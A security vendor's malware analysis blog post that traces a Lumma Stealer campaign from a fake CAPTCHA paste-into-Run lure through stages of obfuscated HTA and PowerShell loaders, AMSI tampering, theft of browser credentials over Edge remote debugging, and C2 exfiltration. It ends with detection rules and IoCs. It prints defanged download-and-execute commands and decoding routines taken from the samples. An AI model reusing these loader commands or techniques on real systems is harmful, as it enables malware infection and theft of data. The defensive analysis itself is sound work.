Caught in the CAPTCHAct: The Technical Tale of Lumma Stealer

Following on from our recent blog post, 'Fake CAPTCHAs, Real Threats: How Lumma Stealer Tricks Users into Self-Inflicted Malware', SenseOn has performed an in-depth analysis of recent Lumma Stealer campaigns targeting a range of our customers.

Background

On the 6th of January 2025, SenseOn flagged a high-priority case within one of our customer platforms. The case identified suspicious activity originating from the 'mshta.exe' process; further investigation revealed that the process had attempted to connect to a domain widely recognised by threat intelligence as malicious.

Fortunately, the connection was blocked by the customer's proxy. To better understand the intent of this campaign, SenseOn analysts replicated the initial access in a controlled sandbox environment and allowed the malware to run. The results from our execution were cross-referenced with telemetry from the customer platform, confirming that the malware did not progress beyond the initial access stage.

Notably, prior to this incident, SenseOn had observed similar attack vectors targeting multiple customer environments throughout December 2024. These earlier campaigns underwent comparable analysis, contributing to our understanding of this threat.

This blog provides an in-depth analysis of the Lumma Stealer malware, highlighting its tactics, techniques, and procedures (TTPs).

Attack Chain

Initial Access

As detailed in our previous post, SenseOn has observed a new strain of Lumma Stealer leveraging fake CAPTCHA verifications, hosted on compromised websites, as an initial access tactic. In the example discussed here, the user interacted with the compromised domain 'guest-incentive[.]fr'.

Analysis of this domain in our sandbox environment revealed a fake CAPTCHA pop-up:

Following the on-screen steps, the "verification" process required us to paste and execute the clipboard contents in the Run dialog (Windows Key + R). While the dialog appeared to execute the benign string '✅ "I am not a robot - reCAPTCHA Verification ID: 6895"', the actual command was as follows:

mshta hxxps[:]//check.qlkwr[.]com/awjsx.captcha?u=b8be078a-a242-43ab-bd8c-674bb96c0017 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 6895''

Executing this command caused 'mshta.exe' to retrieve and run a file hosted on the external domain 'check.qlkwr[.]com'. This suspicious activity was immediately flagged by the SenseOn platform:

Visiting this domain through a browser redirects to 'klipderiq[.]shop', which was hosting an MP4 media file named 'kongo.mp4'.

In the customer environment, the corporate proxy successfully blocked connections to the domains 'qlkwr[.]com' and 'klipderiq[.]shop', preventing any interaction with the malicious sites. In our sandbox environment, however, we observed 'mshta.exe' establish a successful connection to the suspicious domain 'klipderiq[.]shop'.

A total of 2.5 MiB of data was downloaded over this connection, consistent with the MP4 file being retrieved to the device.

All network connections observed by the 'mshta.exe' instance can be seen below:

Payload Delivery

Obfuscated ActiveX Behaviour

Analysing the contents of the 'kongo.mp4' file suggested that hidden HTA code was present. Extracting several '<script>' tags revealed heavily obfuscated code. The following commands were significant and were likely executed in our sandbox:

<script>window.moveTo(9999,0)</script>
<script>window.onerror = function(){return true}</script>
<script>var aETpr = document.documentElement.outerHTML;</script>
<script>var ZkChg = aETpr.substring(27 , 28260);</script>
<script>eval(ZkChg.replace(/(..)./g, function(match, p1) {return String.fromCharCode(parseInt(p1, 16))}))</script>

Upon execution, this HTA script moves the window off-screen and suppresses any further errors generated by the script. It then collects a string from the MP4 file (a slice of the document's own HTML) and decodes it from hex. Each hex byte is followed by a random delimiter character that the regular expression discards; for example, '48d' yields the hex value '48', which decodes to the letter 'H'.
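For analysts who need to unpack this layer offline, the following Python reimplementation of the HTA's `replace(/(..)./g, ...)` step is an added example and is not code from the original post or from the HTA itself. The sample input it decodes is constructed; the script-tag extractor and the `encode_delimited_hex` helper that builds the sample are assumptions for illustration only.

```python
import re

# Added analyst-side reimplementation of the hex decoding step used by the HTA.
# The HTA applies /(..)./g: every 3-character group is a hex byte pair followed
# by one junk delimiter character that the regex discards ('48d' -> 0x48 -> 'H').


def decode_delimited_hex(blob: str) -> str:
    """Python equivalent of blob.replace(/(..)./g, m => chr(parseInt(m[1], 16)))."""
    def to_char(m: re.Match) -> str:
        try:
            return chr(int(m.group(1), 16))
        except ValueError:
            # parseInt on a non-hex pair gives NaN, which String.fromCharCode
            # turns into '\x00'; mirror that rather than aborting the decode.
            return "\x00"
    # Unmatched trailing characters (fewer than 3) are left in place, as in JS.
    # No DOTALL flag: a JS '.' without the 's' flag does not match newlines.
    return re.sub(r"(..).", to_char, blob)


def encode_delimited_hex(text: str, delimiters: str = "dxQZ!k") -> str:
    """Constructed-sample generator (assumption): emit a blob in the same shape
    as the obfuscated payload, one junk delimiter after each hex byte pair."""
    return "".join(
        f"{byte:02x}{delimiters[i % len(delimiters)]}"
        for i, byte in enumerate(text.encode("latin-1"))
    )


def extract_script_blocks(html: str) -> list:
    """Return the text of every <script> tag in an HTA/HTML document."""
    return re.findall(r"<script[^>]*>(.*?)</script>", html, flags=re.S | re.I)


if __name__ == "__main__":
    # Constructed sample, not the real kongo.mp4 contents.
    sample = "<html><script>" + encode_delimited_hex("var x = 1;") + "</script></html>"
    for block in extract_script_blocks(sample):
        print(decode_delimited_hex(block))
```

Because the delimiter is discarded by position rather than by value, the decoder does not need to know which junk characters the sample used; it only relies on the fixed three-character stride.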

Decoding this to a more readable format gives the JavaScript snippet below, which uses the WScript.Shell ActiveX object to execute 'cmd.exe', which in turn ran an encoded PowerShell command:

new ActiveXObject(WScript.Shell).Run("cmd.exe /c start powershell -w 1 -Enc <base64-encoded command omitted>", 0, true)

The encoded command can be seen in our telemetry; SenseOn verified that the customer never reached this stage of infection:

The execution of 'powershell.exe' by 'mshta.exe' triggered an additional observation, which was correlated into our SenseOn case:

Encoded PowerShell Execution

The encoded PowerShell executed by the WScript.Shell ActiveX object decodes to the following:

Sleep 20;
Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ArgumentList "-w","hidden","-ep","bypass","-nop","-Command","& {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create());
 [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('hxxps[:]//xian.klipderiq[.]shop/kongo.db'))));
 (Get-Item Variable:\2LT).Value.Invoke();
 (Get-Item Variable:\2LT).Value.Dispose()}}"

The PowerShell command above initiates a 20-second delay before attempting to retrieve the contents of a file named 'kongo.db' from the domain 'xian.klipderiq[.]shop'. This connection triggered an additional observation in the SenseOn case:

From the network telemetry we can see that 8.98 MiB had been downloaded:

Second Stage

The downloaded 'kongo.db' file contains over 22,000 lines of heavily obfuscated PowerShell code. We have extracted and highlighted the key lines that would have been executed on the compromised device:

function fdsjnh {
   # Join the global $charcode integer array into a single Base64 string
   $array_var = New-Object sYsTEm.CoLLectiONS.arRAyLISt;
   FOR ($i = 0; $i -le $charcode.Length-1; $i++) {
      $array_var.Add([char]$charcode[$i]) | Out-Null
   };
   $z = $array_var -join "";
   $Enc = [SYStEM.TEXt.ENcODinG]::UTF8;
   # 24-byte repeating XOR key
   $XoRKEy = $Enc.GetBytes("AMSI_RESULT_NOT_DETECTED");
   # Base64-decode, then round-trip through a UTF-8 string back to bytes
   $strinG = $Enc.GetString([systEm.coNVerT]::FromBase64String($z));
   $byteSTriNG = $Enc.GetBytes($strinG);
   # XOR each byte with the key; the inner loop advances $i alongside $j, so the
   # effect is byte[i] XOR key[i mod 24], stopping when the buffer runs out
   $xoRdData = $(for ($i = 0;$i -lt $byteSTriNG.length;) {
      for ($j = 0; $j -lt $XoRKEy.length; $j++) {
         $byteSTriNG[$i] -bxor $XoRKEy[$j];
         $i++;
         if ($i -ge $byteSTriNG.Length) {$j = $XoRKEy.length}
         }
      });
   $xoRdData = $Enc.GetString($xoRdData);
   return $xoRdData
}

The function above performs XOR decryption on a large array of character codes, using 'AMSI_RESULT_NOT_DETECTED' as the decryption key. This string is notably the name of a scan result value returned by the Antimalware Scan Interface (AMSI) that Microsoft Defender relies on, indicating that the encoded script is likely designed to confirm it is not being intercepted or blocked by Defender's protections.
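To recover the next stage from a captured 'kongo.db' without running it, the routine above can be reproduced in an analysis language. The Python below is an added reimplementation of that decryption pipeline, not the malware's own code; the `build_sample` helper, which wraps a harmless string in the same layers so the decoder can be exercised, is an assumption for illustration and the string it wraps is constructed.

```python
import base64

# Added Python reimplementation of the loader's decryption routine. The pipeline,
# read off the PowerShell: character codes -> Base64 string -> decode ->
# UTF-8 round trip -> XOR with the repeating 24-byte key -> text.
XOR_KEY = b"AMSI_RESULT_NOT_DETECTED"


def xor_repeating_key(data: bytes, key: bytes) -> bytes:
    """The nested loops advance $i once per key byte, so the effect is
    data[i] XOR key[i mod len(key)] over the whole buffer."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_stage(charcodes, key: bytes = XOR_KEY) -> str:
    """Recover the plaintext script from the integer array ($charcode) that the
    loader joins into a Base64 string."""
    b64 = "".join(chr(c) for c in charcodes)              # $z
    raw = base64.b64decode(b64)                            # FromBase64String
    # The loader converts the bytes to a UTF-8 string and back before XORing;
    # invalid sequences would be replaced there, so mirror that rather than raise.
    raw = raw.decode("utf-8", errors="replace").encode("utf-8")   # $byteSTriNG
    return xor_repeating_key(raw, key).decode("utf-8", errors="replace")


def build_sample(plaintext: str, key: bytes = XOR_KEY) -> list:
    """Constructed-sample helper (assumption): wrap a harmless string in the same
    layers the loader expects. ASCII plaintext XOR an ASCII key stays below
    0x80, so the UTF-8 round trip in decrypt_stage is lossless; that is also
    why the loader's own round trip does not corrupt its payload."""
    xored = xor_repeating_key(plaintext.encode("utf-8"), key)
    return [ord(ch) for ch in base64.b64encode(xored).decode("ascii")]


if __name__ == "__main__":
    codes = build_sample("Write-Host 'constructed sample, not the real stage'")
    print(decrypt_stage(codes))
```

Feeding the real `$charcode` array (extracted from the 22,000-line script) to `decrypt_stage` yields the AMSI-tampering stage described in the next section, without the XOR output ever being executed.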

Process Injection

The script extracted by the XOR decryption scans the memory of the current process to identify regions associated with the Microsoft Antimalware Scan Interface (AMSI). Once found, the script attempts to overwrite that memory location with a Base64-encoded malicious payload; this likely prevents AMSI from detecting the malicious behaviour.

This activity raised a further observation, as suspicious PowerShell keywords were detected in our telemetry:

Decoding the Base64 script returns an executable named 'Gbegyjpm.exe'. The SHA-256 hash of this program was 'af86b32a933800cf30edb4f8f40cddd74253f599eb3edc8aa643fdfd30621f0b', and threat intelligence sources confirm it to be associated with Lumma Stealer.

In our sandbox environment, this suspicious executable appeared to have been injected into PowerShell. This led 'msedge.exe' to spawn with the argument '--remote-debugging-port=9222', causing an additional observation to be raised in our SenseOn case:

Opening 'msedge.exe' with the argument '--remote-debugging-port=9222' allows access to the browser's DevTools. From there, the threat actor is able to steal sensitive data including cookies, saved credentials, autofill information, and browsing history.
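The behaviours flagged across this chain (mshta.exe launched with a remote URL, a shell spawned by mshta.exe, hidden-window encoded PowerShell, and Edge started with its remote debugging port) can each be expressed as a simple process-creation rule. The Python below is an added detection example written for this post's attack chain; it is not SenseOn's detection logic. The events are constructed in the shape of process-creation telemetry (Sysmon Event ID 1 field names), the host `malicious.example` is a placeholder rather than the real infrastructure, and the encoded command is simply 'Write-Host' in UTF-16LE Base64.

```python
import re

# Constructed process-creation events, not telemetry from the post. Field names
# follow Sysmon Event ID 1; malicious.example is a placeholder host.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://malicious.example/awjsx.captcha?u=PLACEHOLDER-GUID"},
    {"id": 2, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c start powershell -w 1 -Enc VwByAGkAdABlAC0ASABvAHMAdAA="},
    {"id": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w 1 -Enc VwByAGkAdABlAC0ASABvAHMAdAA="},   # 'Write-Host'
    {"id": 4, "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "msedge.exe --remote-debugging-port=9222"},
    {"id": 5, "ParentImage": r"C:\Windows\explorer.exe",           # benign browsing
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "msedge.exe https://intranet.example/"},
]

URL_RE = re.compile(r"https?://", re.I)
# PowerShell accepts unambiguous prefixes of -EncodedCommand, so match the short forms too.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)


def _name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


RULES = {
    # Stage 1: the Run-dialog command hands mshta.exe a remote URL.
    "mshta_remote_url": lambda e: _name(e["Image"]) == "mshta.exe"
        and bool(URL_RE.search(e["CommandLine"])),
    # Stage 2: the HTA's WScript.Shell.Run spawns a command shell from mshta.exe.
    "shell_spawned_by_mshta": lambda e: _name(e["ParentImage"]) == "mshta.exe"
        and _name(e["Image"]) in {"cmd.exe", "powershell.exe"},
    # Stage 2/3: hidden-window PowerShell carrying an encoded command.
    "hidden_encoded_powershell": lambda e: _name(e["Image"]) == "powershell.exe"
        and bool(ENCODED_RE.search(e["CommandLine"]))
        and bool(HIDDEN_RE.search(e["CommandLine"])),
    # Post-injection: Edge started with its DevTools port exposed.
    "edge_remote_debugging": lambda e: _name(e["Image"]) == "msedge.exe"
        and "--remote-debugging-port" in e["CommandLine"].lower(),
}


def detect(events):
    """Return (rule, event id) pairs for every event that matches a rule."""
    hits = []
    for event in events:
        for rule, predicate in RULES.items():
            if predicate(event):
                hits.append((rule, event["id"]))
    return hits


if __name__ == "__main__":
    for rule, event_id in detect(SAMPLE_EVENTS):
        print(f"{rule}: event {event_id}")
```

Each rule fires on a single event, so none of them needs process ancestry beyond the immediate parent; correlating all four into one case, as the post describes, is left to the platform consuming the hits.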

C2 Connections

After the process injection was observed, connections to the domains 'carveforutune[.]click', 'cegu[.]shop' and 'klipvumisui[.]shop' were identified:

Each connection raised further SenseOn observations:

Threat intelligence indicates that these connections were likely targeting the following URLs:

  • GET - hxxps[:]//cegu[.]shop/8574262446/ph.txt
  • GET - hxxps[:]//klipvumisui[.]shop/int_clp_sha.txt
  • POST - hxxps[:]//carveforutune[.]click/api

Visiting the 'cegu[.]shop' URL returns a PowerShell script that would likely have been executed on the device:

[Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='hxxps[:]//dfgh[.]online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;

This script attempts to retrieve further data from 'dfgh[.]online', which was down at the time of our investigation. The domain 'klipvumisui[.]shop' was also down at the time of our investigation; however, threat intelligence suggests that a file named 'int_clp_sha.txt', with the hash '16e037d7b5f6a8e02b73671e1214b7979eb5d0ab0fc1106cf4c321f0ff53e13a', would likely have been downloaded.

Further analysis of 'carveforutune[.]click', using threat intelligence, suggests that connections to this domain carried the exfiltrated data.

Additional Samples

SenseOn has obtained a range of Lumma Stealer malware samples distributed from the domain 'check.qlkwr[.]com'; each sample follows a very similar loader and makes very similar C2 connections.

Reviewing the connections in more depth, we can see numerous attempts to connect to '[.]shop' domains, likely in search of an active C2 server.

As a fallback when the [.]shop domains fail, the malware then appears to try to contact a Steam profile. This profile has a very unusual username and has been associated with other unusual usernames in the past:

These strings appear to have been passed through a ROT15 obfuscation. Deobfuscating them yields domains related to Lumma C2 infrastructure. Each of these domains now appears to be down, but according to threat intelligence they are usually contacted via a POST request to the URI '/api'.
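Undoing a ROT15 letter rotation is a shift of 11 in the same direction (15 + 11 = 26), and when the rotation used by a sample is not yet known, trying all 25 shifts and keeping the outputs that end in a plausible TLD is a quick way to find it. The Python below is an added example and not code from the post; the profile usernames quoted above are not reproduced here, so the input is a constructed sample, and the TLD list is drawn from the domains this post lists.

```python
# Added example of undoing ROT-style letter rotation on C2 strings. The input
# below is constructed; the TLDs come from domains listed elsewhere in the post.

KNOWN_TLDS = (".shop", ".click", ".top", ".online", ".com", ".su", ".fr")


def rot(text: str, shift: int) -> str:
    """Caesar-shift A-Z and a-z by `shift` positions; other characters such as
    '.' and '-' are left untouched, which is what keeps the TLD recognisable."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot15_decode(text: str) -> str:
    """ROT15 is undone by rotating a further 26 - 15 = 11 positions."""
    return rot(text, 26 - 15)


def candidate_domains(obfuscated: str):
    """Try every non-zero shift and keep the results ending in a known TLD,
    reporting the shift that produced each one."""
    return [
        (shift, rot(obfuscated, shift))
        for shift in range(1, 26)
        if rot(obfuscated, shift).endswith(KNOWN_TLDS)
    ]


if __name__ == "__main__":
    sample = rot("example.com", 15)   # constructed: "tmpbeat.rdb"
    print(rot15_decode(sample))
    print(candidate_domains(sample))
```

Because `rot` leaves punctuation alone, the brute-force search only ever has to consider the letters, and a single surviving candidate is strong confirmation of the rotation the sample used.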

In our latest sample, Lumma Stealer appears to be beaconing to the domain 'testylaughge[.]top'. We observed an initial POST request to the '/api' URI, with the device's public IP address transmitted in the request body. Shortly afterwards, a large volume of data was exfiltrated via zip files which, when decompressed, revealed the following:

  1. First connection:
    1. 'Debug.txt' - Output of the Microsoft Edge remote debugging
  2. Second connection:
    1. 'BrowserVersion.txt' - Current installed Microsoft Edge version
    2. 'Default' - A folder containing sensitive information extracted from Edge:
      1. 'Dev.txt' - Data exported from remote debugging, primarily containing cookies
      2. 'history' - SQLite database file detailing the user’s browsing history
      3. 'Login data' - SQLite database file detailing login activity and stored credentials
      4. 'Web data' - SQLite database file containing browsing activity details
  3. Third connection:
    1. 'Processes.txt' - A list of all running processes on the device
    2. 'Software.txt' - A list of installed software on the device
  4. Fourth connection:
    1. 'Clipboard.txt' - The current clipboard contents at the time of exfiltration
    2. 'Screen.png' - A screenshot of the current desktop, including visible open applications
    3. 'System.txt' - Contains high-level information about the system:
      1. Antivirus and system specifications: CPU, RAM, GPU details
      2. Device and account details: hostname, username, domain information
      3. Lumma-specific information:
        1. Telegram accounts linked to stolen data marketplaces:
          1. 'lummanowork'
          2. 'lummamarketplace_bot'
        2. LummaC2 Build version - 'Jan 15 2025'
        3. Configuration file path 'C:\ProgramData\golbus\mechom.exe'

Conclusion

Lumma Stealer shows how malware continues to grow more sophisticated, and how attackers keep finding new ways to bypass traditional defences. From fake CAPTCHA prompts and obfuscated scripts to process injection and extensive data exfiltration, this malware demonstrates a highly adaptive and methodical approach to compromising systems.

Through detailed sandbox analysis and telemetry correlation in the SenseOn platform, we were able to dissect each stage of the attack chain. SenseOn's detection capabilities flagged all suspicious behaviour, ensuring our customers remained protected from this malware.

As threat actors continue to refine their methods, it is crucial for organisations to stay vigilant and adopt proactive measures, such as blocking suspicious executables like 'mshta.exe' and disabling unnecessary tools such as the Run dialog. By leveraging advanced detection platforms like SenseOn, businesses can stay one step ahead of these threats and ensure their environments remain secure.

While Lumma Stealer represents a dangerous and evolving threat, thorough investigation and proactive defence strategies demonstrate that such campaigns can be mitigated effectively.

IoCs

Filename          SHA-256
kongo.mp4         c0b648339d6d3f3980359c23319e15de7a8fb7beee2d1f75c9f28e5c18bee703
kongo.db          9c7a1501f82e639f616c9727e9bff00b2ef7e25bca4141652c3ef569a0638643
Gbegyjpm.exe      af86b32a933800cf30edb4f8f40cddd74253f599eb3edc8aa643fdfd30621f0b
int_clp_sha.txt   16e037d7b5f6a8e02b73671e1214b7979eb5d0ab0fc1106cf4c321f0ff53e13a
x.exe             0567b98365f8f5e5a3adf508dc7234ea7b50270a8106c3a66a0da96f38058118
bdd.exe           7e28f0d11b5afab152b60a55fd6a887235f9297353e386b06e6cbd50002fb29b
xdd.exe           f0cff23050c6d669d0456a52f26afb59cbfb122397174aa2393d24787c743e07

Domain                    Associated IPs
guest-incentive[.]fr      46.105.57[.]169
check[.]qlkwr[.]com       104.21.112[.]1, 104.21.16[.]1, 104.21.48[.]1, 172.67.129[.]193, 104.21.32[.]1, 104.21.64[.]1, 104.21.2[.]224, 104.21.96[.]1, 104.21.80[.]1
klipderiq[.]shop          104.21.55[.]46, 172.67.144[.]135
xian[.]klipderiq[.]shop   104.21.55[.]46, 172.67.144[.]135
dfgh[.]online             15.197.240[.]20
nikolay-romanov[.]su      104.21.112[.]1, 104.21.16[.]1, 104.21.48[.]1, 104.21.32[.]1, 104.21.64[.]1, 104.21.96[.]1, 104.21.80[.]1
aleksandr-block[.]com     172.67.164[.]157, 104.21.81[.]211
misha-lomonosov[.]com     172.67.160[.]193, 104.21.14[.]233
sputnik-1985[.]com        104.21.48[.]1, 104.21.112[.]1, 104.21.16[.]1, 104.21.80[.]1, 104.21.96[.]1, 104.21.64[.]1, 104.21.32[.]1
lev-tolstoi[.]com         104.21.66[.]86, 172.67.157[.]254
testylaughge[.]top        104.21.59[.]188, 172.67.182[.]114